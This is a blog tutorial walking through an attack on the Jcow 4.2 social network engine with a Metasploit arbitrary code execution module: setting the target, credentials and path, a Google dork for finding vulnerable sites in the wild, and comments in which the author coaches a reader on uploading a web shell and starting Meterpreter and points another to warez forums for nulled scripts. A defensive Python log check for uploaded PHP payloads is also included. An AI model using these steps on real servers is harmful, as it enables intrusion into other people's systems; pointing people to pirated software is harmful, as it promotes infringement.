4 Steps Hacking Jcow Social Networking Web Server via Arbitrary Code Execution

Type : Tutorial

Level : Medium

Victim Server : Windows XP SP3

Victim vulnerable application : JCow 4.2

Attacker O.S : Backtrack 5 R1

It has been a long time since I last wrote about hacking a web server. Today, while surfing around again, I found that the Jcow social networking engine can be exploited and that the exploit's ranking is marked "excellent".

So what actually happens when you run this vulnerable Jcow version? Put simply, the attacker can get into your web server directory and do anything there. For example, if you host the vulnerable Jcow version (on insecure hosting as well :-) ), your web server directory can be owned.

In this example, let's say I have a vulnerable Jcow web server at IP address 192.168.8.94. It's better to try this by installing your own web server, but if you want to find Jcow in the wild you can search with the Google dork "intext:Powered by Jcow 4.2.0" and register as a normal user there. In this tutorial I have already registered with username victim and password victim as well :-)

Okay, I hope you understand what I said above :-P To make it more realistic, let's try the tutorial…

Requirement :

1. Metasploit framework

2. Jcow.rb exploit

mediafire.com

4 Steps Hacking Jcow Social Networking Web Server via Arbitrary Code Execution :

1. Copy the downloaded jcow.rb exploit from the download link above into the /pentest/exploits/framework/modules/exploits/remote/ folder (see the command below).

cp jcow.rb /pentest/exploits/framework/modules/exploits/remote/

The "framework" part of the path (shown in blue) is there because I'm using Backtrack 5 R1 with Metasploit v4.0.1; the name depends on your Metasploit version, so on your computer it may be "framework3", "framework2" and so on.

If you don't know how to copy the jcow.rb file into your Backtrack, please refer to the tutorial about Linux folder sharing.

2. Open your Metasploit console and then use the exploit you just added before.

msf > use exploit/remote/jcow

3. Next, view the available options for this exploit by running the show options command, and then configure them as shown below.

msf  exploit(jcow) > set rhost 192.168.8.94 --> set the target IP
rhost => 192.168.8.94
msf  exploit(jcow) > set username victim --> set the username
username => victim
msf  exploit(jcow) > set password victim --> set the password
password => victim
msf  exploit(jcow) > set uri jcow --> only if jcow not in / directory fill it here
uri => jcow

Information :

Set uri is used when Jcow is not installed in the web server's main directory, for example http://web-server.com/jcow.

4. After everything has been set up successfully, run the exploit with the exploit command.

PWNED! :-)

Countermeasures :

1. Update your Jcow Social Networking installation to a version newer than v4.2.
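
For defenders: the module output quoted in the comments below ("Uploading the payload: /files/asgRk2.php") shows the payload landing as a PHP file in Jcow's files directory. The Python check below is an added example, not part of the original post or of the exploit; it assumes a combined-format access log and that nothing under files/ should legitimately be requested as a PHP script, and the sample log lines are constructed.

```python
import re
from urllib.parse import unquote

# Combined Log Format prefix: ip ident user [time] "METHOD path PROTO" status
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)

# Constructed sample lines; client IPs are documentation addresses.
SAMPLE_LOG = [
    '192.0.2.10 - - [12/Sep/2011:10:14:50 +0700] "GET /jcow/index.php HTTP/1.1" 200 8841',
    '192.0.2.77 - - [12/Sep/2011:10:15:02 +0700] "GET /jcow/files/asgRk2.php HTTP/1.1" 200 512',
    '192.0.2.10 - - [12/Sep/2011:10:15:09 +0700] "GET /jcow/files/avatar.jpg HTTP/1.1" 200 20311',
    '192.0.2.78 - - [12/Sep/2011:10:16:40 +0700] "GET /jcow/files/%78Yz.PHP HTTP/1.1" 404 209',
]

def files_php_pattern(base_uri):
    """Regex for a PHP-type script anywhere under <base_uri>/files/."""
    base = base_uri.strip("/")
    prefix = "/" + base if base else ""          # "" when Jcow sits in the web root
    return re.compile(
        r"^" + re.escape(prefix) + r"/files/(?:[^/?]+/)*[^/?]+\.(?:php\d?|phtml)(?:[/?]|$)",
        re.IGNORECASE,                            # catches .PHP, .Php, ...
    )

def find_php_under_files(lines, base_uri="jcow"):
    """Return one dict per request that targets a script inside files/."""
    pattern = files_php_pattern(base_uri)
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue                              # not an access-log line
        path = unquote(m["path"])                 # undo %xx so encoding cannot hide the extension
        if pattern.search(path):
            hits.append({
                "ip": m["ip"], "time": m["time"], "method": m["method"],
                "path": path,
                "served": m["status"].startswith("2"),  # 2xx: the file existed and ran
            })
    return hits

if __name__ == "__main__":
    for hit in find_php_under_files(SAMPLE_LOG, "jcow"):
        print(hit)
```

A hit with served set to True means the script existed and was executed by the web server, so the host should be treated as compromised and the files directory inspected; denying script execution in that directory at the web server level is a sensible hardening step alongside the update.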

Hope you enjoyed… Any questions? Just drop them below. :-)

Blogger at hacking-tutorial.com. Love PHP, offensive security and web. Contact him at me[-at-]vishnuvalentino.com

Website: http://www.vishnuvalentino.com

  • http://yehg.net YEHG

    Nice tutorial!
    Thanks for featuring our exploit.
    http://www.exploit-db.com/exploits/17722/

    • http://www.vishnuvalentino.com v4L

      #yehg
      You’re welcome, btw thanks also for your exploit… next time when I write the tutorial, I’ll write a credit for the exploit maker :-)

  • Varius

    Cool. But how to upload some shell to the server? Didn't understand. Can you help me, please?

    • http://www.vishnuvalentino.com v4L

      #Varius
      Actually when you’re inside a meterpreter you just need to run shell command to turn into shell. And about how to upload some shell, maybe what you mean was about meterpreter file system command.

  • Varius

    Thanks for your reply! I'll read that tutorial mindfully. I'm not a hacker, just using this script on my site. One more question: this line 'Uploading the payload: /files/asgRk2.php' so, if I want to upload some shell into my site, using this exploit, for example, gnyshell.php, what command in metasploit should I use? Thanks in advance

    • http://www.vishnuvalentino.com v4L

      #Varius
      You can use meterpreter upload command..

  • Varius

    Thank u!

  • Varius

    Good day! May I ask you one more question? What payload in metasploit should I use to start meterpreter? What steps do I miss? Because exploit connects to vulnerable script, then this message occurs "Exploit completed, but no session was created."

    • http://www.vishnuvalentino.com v4L

      #Varius
      There are many payloads you can use… use the search meterpreter command, or you can also use the show payloads command.

  • Varius

    Thanks a lot! A very useful info I found in this site! You've helped me very much

    • http://www.vishnuvalentino.com v4L

      #Varius
      You’re welcome

  • jjordan

    Dear Sir, I want your 1 help… please help me… I am really in a problem… I want jcow professional v7 plus [Full Version] free downloadable link… plz give me the link… It's my dream to start a social networking site. I come from a very poor family… plz help me plz… waiting for ur help…

    • http://www.vishnuvalentino.com v4L

      #jjordan
      You can search in a warez forum. They have much more resources for nulled scripts, web template and web engine…

  • http://s276214434.onlinehome.us/profile.php?ID=3460 seo copywriting

    Hello! Would you mind if I share your blog with my zynga group?
    There’s a lot of people that I think would really enjoy your content. Please let me know. Thanks

    • http://www.vishnuvalentino.com v4L

      #seo
      Sure, as long as you put the link credit to this website without removing the copyright.